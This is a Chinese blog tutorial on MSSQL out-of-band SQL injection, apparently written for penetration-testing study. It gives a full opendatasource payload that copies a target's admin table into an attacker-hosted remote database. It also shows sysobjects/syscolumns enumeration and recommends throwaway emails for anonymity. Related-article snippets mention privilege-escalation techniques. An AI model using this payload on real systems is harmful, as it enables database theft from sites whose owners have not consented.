五、注入(4)MSsql注入——反弹注入

最新推荐文章于 2023-07-01 18:33:16 发布
最新推荐文章于 2023-07-01 18:33:16 发布
阅读量267 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: SQL注入 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45540609/article/details/115914005
当遇到无法直接获取注入结果的情况,可以利用MSSQL的反弹注入技术。该技术通过将查询结果插入到黑客的数据库中,需要网络通畅和自身的MSSQL数据库。重点介绍了opendatasource函数的使用,以及反弹注入的注意事项,如字段类型和数量的匹配,系统库的利用等。此外,还提供了搭建MSSQL环境的建议,如使用免费虚拟空间。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MSSQL反弹注入

当明明是注入点却无法进行注入

注入工具猜解速度缓慢

错误提示信息关闭

无法返回注入结果等

这时比较好的方法就是使用反弹注入
 

反弹注入原理

1、原理

目标站点把查询数据的结果插入到黑客的数据库里

条件:

1、网络通畅(需要公网ip)

2、自己的MSSQL数据库

2、opendatasource函数

opendatasource(provider_name,init_string)

provider_name参数 MsSQL数据库常写sqloledb,类似接口名称的意思
init_string参数 写连接地址、端口、用户名、密码、数据库名
server=连接地址,端口
uid=用户名
pwd=密码
database=数据库名称

insert into opendatasource('sqloledb','server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkap_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq').DB_14A5E44_zkaq.dbo.temp select * from admin -- qwe

把select * from admin 的结果插入目标的temp表

server后是插入地址,地址使用在香港云申请的连接地址和用户名,密码

sqloledb是构成通道的固定值,不更改

server后是数据库地址

uid后是数据库用户名

passwd是密码

database是数据库名称

DB_14A5E44_zkaq.dbo.temp是查询数据库dbo(用户创建)里的temp表

例如:

 

插入数据:字段数相同、类型相同

MSSQL中的数据库自带表在sysobjects里面,存储字段的表在syscolumns里,主要字段是name和id,要记住id的数字

 

 

3、其他注意点

(1)因为MySQL的兼容性,所以可以写select 1,2,3这样的语句,但其他数据库的查询内容都要写完整。

select 字段 from 表

 

(2)mysql在联合查询的时候对字段数有严格规定,但对字段类型的规定比较淡。

猜输出点要用null填充

null =>  不存在数据类型

union all select null,null,null from 表名

MsSQL数据库要求联合查询的时候,字段数,字段类型都要一样。

可以把null替换成数字、字符类型,看是否回显正常。猜字段的时候可以使用这种方式去猜。

(3)MsSQL数据库也有系统自带库

sysdatabases   查数据库名

sysobjects   查表名

syscolumns   查字段名
 

查表名会发现有xtype字段,S为system系统创建的,U为User用户创建的
而且每个表都会有一个对应的nameid
所以找用户创建的表可以select name,id from sysobjects where xtype='U'

sysobjects 查询系统表   (xtype='U') 用户创建的表

syscolumns 字段  (id=)指定sysobjects库中表名对应id

 

搭建MSSQL环境

可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。

香港云   http://www.webweb.com/

香港云失效用   https://my.gearhost.com/CloudSite

数据库操作     http://mssqlus.webweb.com

临时邮箱      http://24mail.chacuo.net/

 

注册香港云的虚拟空间

这里使用临时邮箱,以免暴露个人信息

创建数据库

 

要记住数据库地址,用户名和数据库名称!!!!

 

点击My SQL控制台创建数据表

 

适用navicat也可以远程管理香港云的数据库,填写正确对待数据库地址和用户名密码即可

 

 

 

 

 

 

 

 

 

 

权限提升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 1020
RottenPotato (烂土豆)提权的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
JDBC元数据操作--DatabaseMetaData接口Demo
01-27
在JDBC技术规范中,提供了Connection,Statement,ResultSet这三个开发过程中经常用到的接口。针对与每个接口,JDBC规范提供了相应的接口描述对象,也就是xxxMetaData系列描述对象。DatabaseMetaData和ResultSetMetaData就是两个常用的获取数据库元数据相关信息的接口,本文只讲解DatabaseMetaData接口获取元数据的方法。 文章地址:http://blog.youkuaiyun.com/chen_zw/article/details/18816599
通过JDBC的DatabaseMetaData获取数据库元数据
hu_shengyang的专栏
08-13 673
1.在项目src目录下创建jdbc.properties文件 内容: dbName=JMJL className=oracle.jdbc.driver.OracleDriver url=jdbc:oracle:thin:@168.9.202.49:1521:test user=TEST password=TEST 2.写一个jdbc处理通用的简单处理工具类JdbcByProper...
java 数据库表反向生成相应的java类
www.hohode.com
02-16 715
转自 http://tompig.iteye.com/blog/1273107  以下内容对原文做了些许修改:字段修改成了小写字母的,增加了对INT,DATE类型的支持。 package com; import java.io.File; import java.io.FileOutputStream; import java.io.PrintWriter; import ja
【使用JDBC获取数据库相关的元数据信息】
qq_45891676的博客
08-03 1109
使用JDBC获取数据库相关的元数据信息
用JDBC获得元数据
10-27 137
在查询一个未知的表时,我们不知道表中有多少列,这些列都是什么类型,可以通过查询元数据,查询他的列数、列名、列的类型。 代码: package jdbc_preparement; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; impor...
MSSQL注入——反弹注入
m0_55854679的博客
02-18 975
文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL反弹注入靶场
weixin_45540609的博客
04-21 639
方法1——报错注入 查找sql注入点 2'order by 4 -- asd,知道字段数有3个,且有一个数据表叫news 2' union all select 1,'aaa','bbb' from news -- asd 联合查询注入发现第2,3个字段是字符类型 2' union all select id,name,null from sysobjects where xtype='U' -- asd 2' union all select id,name...
SQL注入篇——sqlmap安装使用详解
爱国小白帽
01-25 7156
SQL注入篇——注入工具sqlmap使用详解 sqlmap简介 sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。 sqlmap功能 全力支持MySQL、Oracle、PostgreSQL、Microsof...
sql注入的攻击与利用
MSB_WLAQ的博客
10-11 703
前言 本文叙述了在Mysql、MSsql、Oracle、PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与。 文章的内容并不全面,日后有接触新的方法会有补充。 探测方法 首先贴出增删改查的基本语句,加粗部分为用户可控: mysql: select item from table where valuelike db_value; select item1,item2 from table where '**value1'**like db_value
JDBC读取数据库元数据,自动生成JAVA实体类
11-25
JDBC读取数据库元数据,生成JAVA实体类
jdbc获取数据库元数据信息
qq_36022463的博客
07-01 1139
DatabaseMetaData 接口: 获取数据库,,,表,,列,,等元数据信息DatabaseMetaData 获取元数据信息会传很多参数,获取表 :获取字段:获取主键:返回的得到的 ResultSet 可以获取到这些元数据,,比如 ,字段名字,字段大小,字段类型,字段是否允许为空,字段的备注,,
JDBC获取数据库的元数据信息
xiueer
10-02 1800
package cn.itcast.jdbc;import java.sql.Connection; import java.sql.DatabaseMetaData; import java.sql.SQLException;public class DBMD { public static void main(String[] args) throws SQLException {
18、注入篇--反弹注入MSSQL
WX公众号-小白学安全
04-10 838
MSSQL MSSQL基础 MSSQL是指微软的SQLServer的数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库中 注入条件
【源码学习】JAVA使用JDBC获取元数据的过程
码农阿福的博客
07-08 1481
JAVA在平时连接关系型数据库的时候,一般都是使用JDBC的方式连接的,但是怎么获取到库表结构你真的懂了吗? JDBC全称叫Java DataBase Connectivity),可以理解为是一种执行SQL语句的JAVA API。主要用来对常用的数据库系统连接交互。API主要由以下组成user表结构如下: USER_ADDR地址表结构如下 示例代码: 运行结果: 获取元数据成功在上文示例中,JDBC连接MYSQL通过information_schema数据库下的schema、table、column表存
JDBC学习笔记之元数据
qq_32971807的博客
08-11 1294
元数据是关于数据的组织,数据域及其关系的信息,简而言之,元数据就是关于数据的数据。     好比,我们得到数据库、表、列等的定义信息。这些信息,就是元数据。   JDBC针对元数据的操作主要由常用的三个借口展开,即Connection,Statement,ResultSet:数据库元数据(DatabaseMetaData)、参数元数据(ParameterMetaData)、结果集元数据(Res
mssql反弹注入
笔墨稠思
11-25 457
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 580
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
21【JDBC操作数据库元数据】
緑水長流*z
08-29 959
当使用语句对象(PreparedStatement、Statement)执行查询获取结果集时,使用结果集对象(ResultSet)可以获取本次查询结果集的元数据,元数据中包含了查询结果集的列数量、指定列的类型、指定列所在的表名等详细情况;当使用PreparedStatement对参数进行预编译处理时,可以获取参数的元数据,例如预编译的参数个数、参数的类型等,但在MySQL驱动大部分方法都不支持,关于这个功能我们了解即可;...
MSSQL注入目录查找辅助工具使用说明
在深入分析标题“MSSQL手工注入查找目录辅助工具”和描述“MSSQL手工注入查找目录辅助工具.rar”所蕴含的知识点前,我们首先要明白MSSQL的含义。MSSQL是Microsoft SQL Server的简称,是一款广泛使用的数据库管理系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值